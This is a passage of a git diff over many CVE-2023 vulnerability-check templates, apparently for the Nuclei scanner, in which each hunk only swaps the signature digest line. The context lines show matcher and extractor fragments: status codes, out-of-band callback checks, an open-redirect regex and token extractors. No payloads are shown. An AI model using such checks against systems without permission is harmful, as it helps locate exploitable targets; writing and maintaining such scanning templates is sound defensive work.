b/http/cves/2023/CVE-2023-24243.yaml @@ -48,4 +48,4 @@ http: - type: status status: - 404 -# digest: 4a0a00473045022054c3c87e069b7846742f839a48c18be5bc69b97802d64b2331e054b536034d060221008e48d0ad117709530cac2b848e0f5c767120497bc71b446ac4435ee05a22b65b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502207f5fa23c6975f41020d64c2d8fcf00e92fe5ac1c8fe8e17e5dfa2284fefbf180022100cde57721a573873e8f0f46f15a87d3e886385502949ed9f50aff36b9dccdfc94:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-24278.yaml b/http/cves/2023/CVE-2023-24278.yaml index cff34a912b..c0faa3b565 100644 --- a/http/cves/2023/CVE-2023-24278.yaml +++ b/http/cves/2023/CVE-2023-24278.yaml @@ -54,4 +54,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100864e11cd58027c669cee192c677ee283ed0733f2678005853b921cfb44f28b3102200322c72442e008b6ef888ff07403a0ec4d6adf83bcfc2588e2787801ef103cef:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022075936e59a6abe44eca6d08a907e1997d26c08a741ab9e8b33b1dd72ce0770618022100930a07f08705b2c3bc8f969b1342f7b7d1a6dc010a918a4dc424f8eb0861a7aa:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-24322.yaml b/http/cves/2023/CVE-2023-24322.yaml index 1e612e38c9..127abc79a2 100644 --- a/http/cves/2023/CVE-2023-24322.yaml +++ b/http/cves/2023/CVE-2023-24322.yaml @@ -53,4 +53,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100d4b793962f02a94d8db15533461bce0f9799f188a498b05b38d0da714a23c4ad0220610e78c9f9d83ddf1b56ac0ec677dc3aeec74ce80aee1e69b72de56930a880fb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a0048304602210090072fab3f7daa8ad22f62f50828a414d2d9547e568b07649118acdd07b16f27022100ee65f1ca805c95fbb8768b88cd1839daef838ec8c290b5470a5e8203b511d478:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-24488.yaml b/http/cves/2023/CVE-2023-24488.yaml index 38441aeee6..60fe87763f 100644 --- a/http/cves/2023/CVE-2023-24488.yaml +++ b/http/cves/2023/CVE-2023-24488.yaml @@ -58,4 +58,4 @@ http: - type: status status: - 302 -# digest: 4a0a00473045022100b9fde4e5a98c376353cf072f935c8a0b049c84919585134c7a52d0eb9623953f022000d7a1f8d0dad24a1042be1bc800c8bf3322dcd62b54fea3327e0face361a222:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100badcc6f7c01e3ebfeba9d79731cabde3a35cf09507addd97975878d01d4d6bb1022100d93e39472b12d5b1c7403c5e5b8a719b384a1f13679d8992246b838cbe6f85f6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-24489.yaml b/http/cves/2023/CVE-2023-24489.yaml index cfe10e1c0c..bed765c579 100644 --- a/http/cves/2023/CVE-2023-24489.yaml +++ b/http/cves/2023/CVE-2023-24489.yaml @@ -64,4 +64,4 @@ http: - type: dsl dsl: - 'BaseURL+ "/cifs/" + fileName + ".aspx"' -# digest: 4b0a00483046022100e02ace90a1a3782dc846f7db6c3799e3e6f2dbd7db12315587f79f87591c3e76022100d83634800b925f23dbb1f24ae13c6577e8531c7008b64b40c03a95995e205afa:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402207c13319c615b1019fdab585c8cbd7b2edee47b2af7154ef818ca85bad17fa41902203d468e94c8f9a7cc92a08383e2ea4e4d2f2aa462566a271bfa9c7ca37c8a54a3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-24657.yaml b/http/cves/2023/CVE-2023-24657.yaml index 41b6ab4fec..47806dddca 100644 --- a/http/cves/2023/CVE-2023-24657.yaml +++ b/http/cves/2023/CVE-2023-24657.yaml @@ -48,4 +48,4 @@ http: - 'status_code_2 == 200' - 'contains(body_2, "") && contains(body_2, "Subnet masks")' condition: and -# digest: 490a0046304402207f21098ce5bf40eb4a6275ff15bb690cbde2da1648dff89f6ac3fb578d943bec022054add055809df92504ac4ebeff525e4c4182ece10d818fb597ffa9f48b7bf6b6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100b43040d5ddff0d907d757322ca19e86d165f3d6ac79b7cc01317cefe96c180a90220747af3c14f10ca46f6e1696b2dac795c114cb9da5911337646a25b4e6a114e17:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-24733.yaml b/http/cves/2023/CVE-2023-24733.yaml index 69d9f78a53..40d7f5e4a8 100644 --- a/http/cves/2023/CVE-2023-24733.yaml +++ b/http/cves/2023/CVE-2023-24733.yaml @@ -51,4 +51,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100d08cf09e7dc5425596c3cca412921a6990b702806ce847b868b3179a77b3dfca022051df8f622f5f78b42f4466f8f3cf2e9fbc6b5eccf03b1270d759323219651ba1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100e1e27a0f34dc14bd9119c0d0e138879127d2a945f22432b0ee16eefd4fae4fcd02202120d60f8a5b82dd8bb101b21fc46291819c8455bd065df6afa462cc7fb902f2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-24735.yaml b/http/cves/2023/CVE-2023-24735.yaml index 9c5546ff00..384df1bd0e 100644 --- a/http/cves/2023/CVE-2023-24735.yaml +++ b/http/cves/2023/CVE-2023-24735.yaml @@ -41,4 +41,4 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)oast\.me\/?(\/|[^.].*)?$' -# digest: 4a0a00473045022100ceae583574e8508ec06b34037f78dc1c5f19ddc0b9d7c67ca4b8d421f11f32b802205b406cd0b8fb8a762e03ccc5cfbe8aedd976adc4e1b121163062d916f54bb57f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022069ec2106a76675c191d0555541954f4ca1efe54795dc909ab5799ae5a3c45c1602204731da01a25e1b558aa2849b09255dfd79d27630dbdd890f7a2834424f17ae4c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-24737.yaml b/http/cves/2023/CVE-2023-24737.yaml index daf4ce9c0e..84c8146af2 100644 --- a/http/cves/2023/CVE-2023-24737.yaml +++ b/http/cves/2023/CVE-2023-24737.yaml @@ -52,4 +52,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402207a433ef07e25a34aa6e771afe6bcd7421f7d8f9da2a819104633dfaebb224713022057a7b3b74f01ee1509016fec6b6e58f2647005bff55b022b5ac8592a800fe4c9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022074f3529913e227e5f0411e5d925d209de9847be12d25d58a096ebff0c4540b6a02204ff305fe3af41fc2553100e207ba452f264233f8bae6607702862cd0b0b5fa67:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-2479.yaml b/http/cves/2023/CVE-2023-2479.yaml index c412ab515a..9c532f85dc 100644 --- a/http/cves/2023/CVE-2023-2479.yaml +++ b/http/cves/2023/CVE-2023-2479.yaml @@ -52,4 +52,4 @@ http: - type: status status: - 404 -# digest: 4b0a00483046022100d44c6fd6e068737f5ac44173614742e26bb00e419da5422b4137ec5d86e4f57d022100f437027151fbfc03ee45e7332fab84cc9f46e0b134ce5ac0d3948dd9d6147a19:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100c1a352672a989af8e3c79dfa0ed6be743b40148495bfe0de7495e721c3d3cf30022100dbadd06ff944bb8596396571fff0382198c298180fd68270d546b2d3f2500ef7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-25135.yaml b/http/cves/2023/CVE-2023-25135.yaml index 9c196102e7..98bb1ce4c9 100644 --- a/http/cves/2023/CVE-2023-25135.yaml +++ b/http/cves/2023/CVE-2023-25135.yaml @@ -59,4 +59,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100ce2bf923005a767a1b859b3e4f2a4fce8709e03f3e8ca3913a9b86099ccf4d6d02203544ccb00bbe8541385556ded06192cb9d058e991038779cf79a4934da6495bf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502205a410d762f000309f54731519ff76b949ba22e581faa23443d375858f72011b5022100f0fc76b5b21173b158bd9d70a7ab47b52ba71d848be5e0a48c35caa98aec82d1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-25157.yaml b/http/cves/2023/CVE-2023-25157.yaml index be536f257c..d01133cc94 100644 --- a/http/cves/2023/CVE-2023-25157.yaml +++ b/http/cves/2023/CVE-2023-25157.yaml @@ -78,4 +78,4 @@ http: - 'FID,([aA-zZ_]+),' internal: true part: body_2 -# digest: 4b0a00483046022100a3222cc7b1d0a9ddb3db8e1edf4d46d53dc3d1e5c5183e91d231d4b6d2965c23022100866dde35ab00b7554d055458ac9c8e99054504e1b114976d1d16b238249aa447:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450221009b053edce21fd6de480945838b88b1d0a40a78956855915543949ee99ce77afd0220279858bce10c1808a98ffa467c52d81d8867015b84472be11d80e3acc10e5cbf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-25194.yaml b/http/cves/2023/CVE-2023-25194.yaml index 5bf9e89c79..c9c2edc4e8 100644 --- a/http/cves/2023/CVE-2023-25194.yaml +++ b/http/cves/2023/CVE-2023-25194.yaml @@ -97,4 +97,4 @@ http: - type: status status: - 400 -# digest: 4a0a00473045022100f788a795856513e1cd0015cba30415da3dd2e1a04d54f3ce0b6fb0f6f63e6ec9022005b2370ad3db8893c2793d0916510d1ddd938746e3cb8ef40eec403e4e3218d5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502203e73ac9fdf5b0743ff5219b36631bae363aa2c377bcb325db674d83289fa2f5c022100ad756a8663c7df0962fece18df6230af5d78c6bb80beb1e3e0fdbc3e7ee4d25e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-25346.yaml b/http/cves/2023/CVE-2023-25346.yaml index da87fc1444..8a8b7d8f29 100644 --- a/http/cves/2023/CVE-2023-25346.yaml +++ b/http/cves/2023/CVE-2023-25346.yaml @@ -51,4 +51,4 @@ http: - 'contains(body_2, "")' - 'contains(body_2, "ChurchCRM")' condition: and -# digest: 490a0046304402207b82c78496d0686df4a8b54ee3e7430a2aae6a4d50f75c48c28383063a9c1851022055cbcd42db1a3790b0acdd4afd092d56e421d551edd10257dab81b1e6c7cbe78:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220266625a03a385660482d100a25922e690653fdba45bf1e1a41a827fd8af8caa6022100ca808f4d98cd7c2a45723e7770bcb998dbaf4affca5206da3a7bd75d4ff13283:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-25573.yaml b/http/cves/2023/CVE-2023-25573.yaml index 640deeabc5..3628b7d142 100644 --- a/http/cves/2023/CVE-2023-25573.yaml +++ b/http/cves/2023/CVE-2023-25573.yaml @@ -60,4 +60,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100ab816efcbc5a7db8eacab493caab83f3dba6c09efceae69db79af63d2d711e3c02204b221648b2e6153a538e9fd48e38ff9a6a67590aa66a6b7a9e031080ffa9edc8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100b05003982cc5d539c962ab8df15b08afd1484933fdf8f7b332f1ae63a3101926022043b6b3618281d9ad5edbee8271c7e5f6d665e04d97324064ef18eed214421e0a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-25717.yaml b/http/cves/2023/CVE-2023-25717.yaml index 49f04011f8..dedfb5267c 100644 --- a/http/cves/2023/CVE-2023-25717.yaml +++ b/http/cves/2023/CVE-2023-25717.yaml @@ -44,4 +44,4 @@ http: - contains_all(to_lower(interactsh_request), 'user-agent','curl') - status_code_1 == 302 condition: and -# digest: 4a0a0047304502200deafea4ba54747e5bf0550af972b71e8b94a3fb9846f463fd3084ad5465d5f9022100fcafaf89869758bc5c5e6f633b28dbdfbb2c9cecdd09bf18269b8681b083b713:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402207aa0fac0e4628c0de249eac5b623c777c20e853d0ff13525bdb74c4a30bc00050220763758c1ceeba32ba3a3c0b04d1e078802f210bb0b08272ab82323da2edf0170:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-26035.yaml b/http/cves/2023/CVE-2023-26035.yaml index 103c23a2f8..952b598ee5 100644 --- a/http/cves/2023/CVE-2023-26035.yaml +++ b/http/cves/2023/CVE-2023-26035.yaml @@ -57,4 +57,4 @@ http: - type: dsl dsl: - contains(interactsh_protocol, "dns") -# digest: 4a0a004730450221008b4a73452ed681a25f40c5d8e7147de5a1a677aa0219ecfccd0e91aa6d829e010220268da47753cbd7b38ff64871e15e81c9fea1d053df5af7339687863c544545f2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100d5871c917f51f34d6deee91a3087ffd937ba9f297849249880c00627f9f72b4e022100dd8947408e2038c92eabf9ea24e85a4faf1c9247ae248274ae33bda3702cd484:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-26255.yaml b/http/cves/2023/CVE-2023-26255.yaml index f61456c077..9fe41a81d3 100644 --- a/http/cves/2023/CVE-2023-26255.yaml +++ b/http/cves/2023/CVE-2023-26255.yaml @@ -54,4 +54,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450221009eff1cfcd9afb5c04d7b263baaf2ff4faf43631d4e6eaf033ca3c6b8fd85de5d022060065320c9d8eac58e06f71ddabfeaecb433875fa230c89a4015e129415c44f3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402204eec07808c796fe47bd1c88eb1df93ec5716fd9073758a669e1322d7b6e4df9b02206ad2b2b3fc6a189cd1a49073e1e51761366c9425452997c29e3919cf59518e4e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-26256.yaml b/http/cves/2023/CVE-2023-26256.yaml index a68539f2c6..4b3b04e8b6 100644 --- a/http/cves/2023/CVE-2023-26256.yaml +++ b/http/cves/2023/CVE-2023-26256.yaml @@ -53,4 +53,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402206f7621cf2a7737e42311ac572bb467a25f6560465b43af82ee9c969c46abe69702200c966cadb0385e22cc13c7c570a1cf029c3c48849d60dc56ac002c93b7bb9df3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100b63fae8c757a7959d9bca7e8411cd90e40d3badf4485ee9767b735866828278d022055c879e17b683bdc1c37ab1c29fb7bc38746fe1e757413ff76f152b1836f9dbb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-26347.yaml b/http/cves/2023/CVE-2023-26347.yaml index cf9c5d8316..e67b747c7f 100644 --- a/http/cves/2023/CVE-2023-26347.yaml +++ b/http/cves/2023/CVE-2023-26347.yaml @@ -47,4 +47,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100ff9ea4c7bbd58eacf86b3cf227f3254dda5e64c7b988c29f30139e7ad99bb7a0022100e070f165193a71a78fb1a8a365556a407e03a9e1e1de475e39814e5196600017:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502200f483b6e768f5779f0b4be6bda01f39a5cf2258ee03626dc422824b072c4ed27022100f25722589eebbdd333b014b18de6e0dd8e7169033b5fef7a442b465ae8510cf8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-26360.yaml b/http/cves/2023/CVE-2023-26360.yaml index d92a6456fc..afbeaa7449 100644 --- a/http/cves/2023/CVE-2023-26360.yaml +++ b/http/cves/2023/CVE-2023-26360.yaml @@ -57,4 +57,4 @@ http: part: header words: - "text/html" -# digest: 4a0a0047304502205698995c249ffd4a99ec1e5e70748e5ff9b6672660456da63e2278057f774024022100cc2e426ca1958716eefc00654a4ef74b95883bc11134b574c4d717b24441305f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100bc335dc15804e170ba09bd4de98827d092ce77967b6719237bb645debf5e38100221009a253706430a21c94129f4866759a190637dd34b35c72dd62a2b1e0a84444cc5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-26469.yaml b/http/cves/2023/CVE-2023-26469.yaml index a6e10da7f7..ae4d8808e5 100644 --- a/http/cves/2023/CVE-2023-26469.yaml +++ b/http/cves/2023/CVE-2023-26469.yaml @@ -73,4 +73,4 @@ http: name: csrf regex: - 'name="csrf_test_jorani" value="(.*?)"' -# digest: 490a0046304402200b60e70c837357ee28e98935c27bde05998b539897928baabec57666aed0b919022046a262ba1607e583c4f6c3b067a69772bd79b9667dbbb3502fbd54561a7b73dd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502202d242b66bd8eb4a49f3a58f63f9c6f4636cbb06ed2385b224eb84a9a85fbafc7022100f669d3c8440de4b34277c09cef8b261b1bbd6dadbd1a721a75917f13fecba160:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-26842.yaml b/http/cves/2023/CVE-2023-26842.yaml index 163547e3ec..90172f6baa 100644 --- a/http/cves/2023/CVE-2023-26842.yaml +++ b/http/cves/2023/CVE-2023-26842.yaml @@ -61,4 +61,4 @@ http: regex: - 'id="form_session_token" value="(.*)" type="hidden"' internal: true -# digest: 4a0a00473045022100deca6566231b825072b920c7159063966ba0e0d72d70db60a9fa69ae05b1fbe5022073f4adad294645fff730e4db3d3115fd31616a4e889dc68aa57fbafd5817c833:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502204811c3399bdef9b6e0dd13a822ade7c6c9a78fa31bcbd88b7789937bc24c68150221008a9fefa1ec16084c87e7350bafea77fc13dc3b235e9ab50c4cc1728b4da014e8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-26843.yaml b/http/cves/2023/CVE-2023-26843.yaml index 7f6d4cbd1e..a1623a94d7 100644 --- a/http/cves/2023/CVE-2023-26843.yaml +++ b/http/cves/2023/CVE-2023-26843.yaml @@ -55,4 +55,4 @@ http: - 'contains(body_2, ">")' - 'contains(body_2, "ChurchCRM")' condition: and -# digest: 4b0a00483046022100a12d03c09c04ff3fd0eb21429cffd53dae7683b12ce3bbcf005f8d5e4320dfcd022100ac9beadeb589b7538505258a13544fe51ef33ad0ec8300d92680d1121b40dc06:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100d2a837a350a382a25d524a78a59886d5543fbb00360d0e233939ca64c61aee710220045d3121c7563ac0e22c73421256f86098bb2235f4dc56cf35be3f7996b56d37:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-27008.yaml b/http/cves/2023/CVE-2023-27008.yaml index cdaa5dd61b..b3bef1f57a 100644 --- a/http/cves/2023/CVE-2023-27008.yaml +++ b/http/cves/2023/CVE-2023-27008.yaml @@ -58,4 +58,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100b34b512d32b022e240aa98f18a8d87185f4225c0d321f534cfa85def4ee3bc8602202a38b89f5ae73498ed2709a3fd2ad2b98df29a16fc00c3b155cf941e5d1b3276:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100934ff1b637515e0ecac3d09098294f06bf8a897dc09a9afa8236f528a3e1c137022100e85cf931c8d91be0bd06a31f3274e5a0f59180d13ac05db24753b9198e2be862:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-27032.yaml b/http/cves/2023/CVE-2023-27032.yaml index e4d40bdf61..14e0905fdb 100644 --- a/http/cves/2023/CVE-2023-27032.yaml +++ b/http/cves/2023/CVE-2023-27032.yaml @@ -63,4 +63,4 @@ http: regex: - ',"static_token":"([0-9a-z]+)",' internal: true -# digest: 4a0a00473045022100aa46ba83eaa1e937eb89a6c4296e4efd072af40a4bcf8e687f6f3ea2551ed66502204452a505bdad3d329e7fdb44f2aa4ad0a0be98e174650aed8a5f057d51935856:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100c8f4ed29d0095b7b570653f43172c909e18462ba144953cf4238d288cf0499ad02203b8e7489126202287ddad617939812b2ea43c464b639f7e41397993a0931643e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-27034.yaml b/http/cves/2023/CVE-2023-27034.yaml index f6edbc4ced..05662e23ae 100644 --- a/http/cves/2023/CVE-2023-27034.yaml +++ b/http/cves/2023/CVE-2023-27034.yaml @@ -80,4 +80,4 @@ http: - 'duration_1>=6' - 'contains(body_2, "Jms Blog")' condition: and -# digest: 4b0a0048304602210081fd270095a1404c3f7c68821fe46c6300eebf304f7a30088cec551889da6164022100ab7775c739fdba4a50da051bb34459f44f5affaff61c41d0febd3e14967c7bdc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100842f6d137227d9615048da5a7346e239d060859af380518f03f3b9afcc9d583102200f06aede5a783292f532ea71439283376b6140cade971197fc79d3dda174db61:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-27159.yaml b/http/cves/2023/CVE-2023-27159.yaml index 1af99d4e59..e668a74cea 100644 --- a/http/cves/2023/CVE-2023-27159.yaml +++ b/http/cves/2023/CVE-2023-27159.yaml @@ -50,4 +50,4 @@ http: part: interactsh_request words: - "User-Agent: Appwrite-Server" -# digest: 4a0a0047304502210081af9d0fa841653c4d08863d80b449d96d7cc156c3cd2dfa6158234a730a4514022022d68c4ca6f83a4d3f5d24f0389e3e609c12a912a37a2a1382c063f62de56f7b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a004830460221009995c76e71bc9dfb63841aac9f371ad3473812dd9d9e92771f5127cb7ee8fcc7022100add03fbd8cf31aa10595f8064487e6171a3e858699f964a91273205cea0742f0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-27179.yaml b/http/cves/2023/CVE-2023-27179.yaml index 36ae3a3da8..fcfc48d242 100644 --- a/http/cves/2023/CVE-2023-27179.yaml +++ b/http/cves/2023/CVE-2023-27179.yaml @@ -53,4 +53,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502202ed098aec99fb6f0ef97db4bc8923c33d44632198533143bc0941afabc069043022100e2d8ea18692381c14fd9825ea2dcbe02f49906b3c573b05a4c7a4e74d4022dd2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402202dd93e61d0ee307383828e3dbd0fa3207ab6f177ec8cf63a020a7d73aaa4e3cb02206562c141f0747ae18fd56df1db0ad6e9536ecab905b947438d1242949676d43d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-27292.yaml b/http/cves/2023/CVE-2023-27292.yaml index e329de37bd..561a9c1e67 100644 --- a/http/cves/2023/CVE-2023-27292.yaml +++ b/http/cves/2023/CVE-2023-27292.yaml @@ -57,4 +57,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100f9f53e3e452787d9724750d3608ce6b68eb37eb2bed9e816ce331a5b6b096969022100a08d99c502029867566a633e6b96973ec21e625d67f3506e7a58117d32a30a32:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100aae1076025375cd4ef97f803e224c4076f48a61930dd0dc46f0e499e6ccd48bb022100ee135b1050dfff3ee03dbae3fa46d613bbafaa2b9bb563a5f67239415f9fc369:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-2732.yaml b/http/cves/2023/CVE-2023-2732.yaml index e64e29d563..7f1c5ccad0 100644 --- a/http/cves/2023/CVE-2023-2732.yaml +++ b/http/cves/2023/CVE-2023-2732.yaml @@ -55,4 +55,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022074722a892bf238338051f9fb3a47cce0886edc1d9d30ec3a5021c0ecd11006f1022076a0ddee63a3dd22874ab38c61f047339e761aec7e499fcc94cffa02f1c32b99:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100fb38cf1cbc1e90a6a108d1281bf3d69f08d64d2e50b301b7b8bc260b5a67db880220087e68adec2ea336bf216752b26d541262e503c818cc970d153844c758d202ce:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-27350.yaml b/http/cves/2023/CVE-2023-27350.yaml index a0daffd738..3d4550d423 100644 --- a/http/cves/2023/CVE-2023-27350.yaml +++ b/http/cves/2023/CVE-2023-27350.yaml @@ -127,4 +127,4 @@ http: - 'erList\/selectPrinterCost&sp=([a-z0-9]+)">' internal: true part: body -# digest: 4a0a00473045022100c43bc6a64df519a04b0c32ae002356fe4d745056e646acc1f73d048219fc0fdd022019e36e542ac51a145ed37740864eba86659fd657e0d6d986377e75bd06ca13e1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a004830460221009d354896dfc5197fe175c60ac3dc9ca83dc8f744a1ee819b236565f07e2fa379022100bf100d32faa3748a2a5a7f3a3081e592dbc7cf1af921b4324074670798c5ebe9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-27372.yaml b/http/cves/2023/CVE-2023-27372.yaml index 1ecb398ce8..bf59d9c052 100644 --- a/http/cves/2023/CVE-2023-27372.yaml +++ b/http/cves/2023/CVE-2023-27372.yaml @@ -72,4 +72,4 @@ http: regex: - '>PHP Version <\/td>([0-9.]+)' part: body_2 -# digest: 490a004630440220786d7c2a2e607ddcae695760633ce2fa3d1f8acd176f947e34e32b3b6e979f780220653af3d4cfc548d7a3c4e8873b45fd038152bf4a4b6496bd1376574cc0129caf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a0048304602210094f67b702cc3346ddeb9f5641612b4357b608a7123e2a256b7ac8e2f375e19cf022100a64f29ba036ca63f9ff74a922c545f9d67e1a805a5918b0537a0a9ac925d0ae0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-27482.yaml b/http/cves/2023/CVE-2023-27482.yaml index ea53e69211..a9759ecba1 100644 --- a/http/cves/2023/CVE-2023-27482.yaml +++ b/http/cves/2023/CVE-2023-27482.yaml @@ -67,4 +67,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402203099f51b6c29d9951ebbeea0226d34c46a55f9f81b5c49107101414fc2eab40902200dddf0dae1c97279adf3b04e93e7fbd9f74a481951149a2cdece3bc3ed44d82b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100eaa8ac0a65182f730224ca3055081b5eea65437a110d340c07998585d06e7d9002207b2e5ea28e6be898073c10ec03572e130e6b7a59b9508c11d3b5c2a89a7ed554:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-27524.yaml b/http/cves/2023/CVE-2023-27524.yaml index f8ee44170b..5f08488576 100644 --- a/http/cves/2023/CVE-2023-27524.yaml +++ b/http/cves/2023/CVE-2023-27524.yaml @@ -72,4 +72,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100e9873ef2152bc24254405f66645dfe7d2f2126dd9d33407920ae3ac8b62a0f6e022100ea81d9a3cfab7defcab09ea9b1fc09ccb7090879ae84b763241e3f4c7896beac:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100fc59900916f76334ed6ff60aca8ce461bebb9927501c28b0e3a1c48f78d8af820221008c131dec5fac44bd24a1e94075f0af16a26c6f41931e7326752ee81220d03ac4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-27587.yaml b/http/cves/2023/CVE-2023-27587.yaml index 1219284f81..8225a3ae90 100644 --- a/http/cves/2023/CVE-2023-27587.yaml +++ b/http/cves/2023/CVE-2023-27587.yaml @@ -62,4 +62,4 @@ http: - type: status status: - 500 -# digest: 4a0a004730450221008e004c348a677bde325cd7abafaf76c6c1c5598d263de7b08ffedf49727b2bdb022051961d005e215d78fbc7abd5a6e925cf4a14ae704d246efec0d8522a611ea34f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100e06b609fa75c61cfa4d104be047ab72148eb1f763831efbe742adcc8f53a159d02200e9faa3e0761679c4a28dc1848048b2b73bce8f1fd34848e8471ff1103f0b6f1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-27639.yaml b/http/cves/2023/CVE-2023-27639.yaml index 1dc64311e0..706e1d97ce 100644 --- 